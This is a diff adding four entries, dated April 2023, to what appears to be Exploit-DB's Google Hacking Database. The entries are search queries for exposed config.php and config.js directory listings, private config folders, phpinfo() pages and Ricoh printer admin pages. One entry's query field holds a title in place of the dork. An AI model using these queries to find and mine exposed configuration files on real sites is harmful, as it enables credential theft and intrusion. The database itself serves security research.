-42654,6 +42685,21 @@ DORK: intitle:"index of" "config.js" 2021-10-04 Suman Das + + 8154 + https://www.exploit-db.com/ghdb/8154 + Files Containing Juicy Info + intitle:"index of" "config.php" + # Google Dork: intitle:"index of" "config.php" +# Files Containing Juicy Info +# Date: 13/04/2023 +# Exploit Author: Jerr279 + intitle:"index of" "config.php" + https://www.google.com/search?q=intitle:"index of" "config.php" + + 2023-04-14 + Jerr279 + 6048 https://www.exploit-db.com/ghdb/6048 @@ -49102,6 +49148,21 @@ Dxtroyer 2017-04-06 anonymous + + 8156 + https://www.exploit-db.com/ghdb/8156 + Files Containing Juicy Info + inurl:"/private" intext:"index of /" "config" + # Google Dork: inurl:"/private" intext:"index of /" "config" +# Files Containing Juicy Info +# Date: 13/04/2023 +# Exploit Author: Jerr279 + inurl:"/private" intext:"index of /" "config" + https://www.google.com/search?q=inurl:"/private" intext:"index of /" "config" + + 2023-04-14 + Jerr279 + 8152 https://www.exploit-db.com/ghdb/8152 @@ -52034,6 +52095,21 @@ Thanks & Regards 2021-01-07 Rushabh Doshi + + 8157 + https://www.exploit-db.com/ghdb/8157 + Files Containing Juicy Info + inurl:info.php intext:"PHP Version" intitle:"phpinfo()" + # Google Dork: inurl:info.php intext:"PHP Version" intitle:"phpinfo()" +# Files containing juicy info. +# Date: 13/04/2023 +# Exploit Author: Vitor Guaxi + inurl:info.php intext:"PHP Version" intitle:"phpinfo()" + https://www.google.com/search?q=inurl:info.php intext:"PHP Version" intitle:"phpinfo()" + + 2023-04-14 + Vitor guaxi + 4389 https://www.exploit-db.com/ghdb/4389 @@ -105922,6 +105998,21 @@ temperature, etc) can be found. 2006-10-02 anonymous + + 8158 + https://www.exploit-db.com/ghdb/8158 + Various Online Devices + intitle:Web Image Monitor inurl:mainFrame.cgi + # Google Dork: intitle:Web Image Monitor inurl:mainFrame.cgi +# Various Online Devices +# Date:14/04/2023 +# Exploit Author: Hasan Ali YILDIR + Google Dork: Recoh Printer Properties Page + https://www.google.com/search?q=Google Dork: Recoh Printer Properties Page + + 2023-04-14 + Hasan Ali YILDIR + 4200 https://www.exploit-db.com/ghdb/4200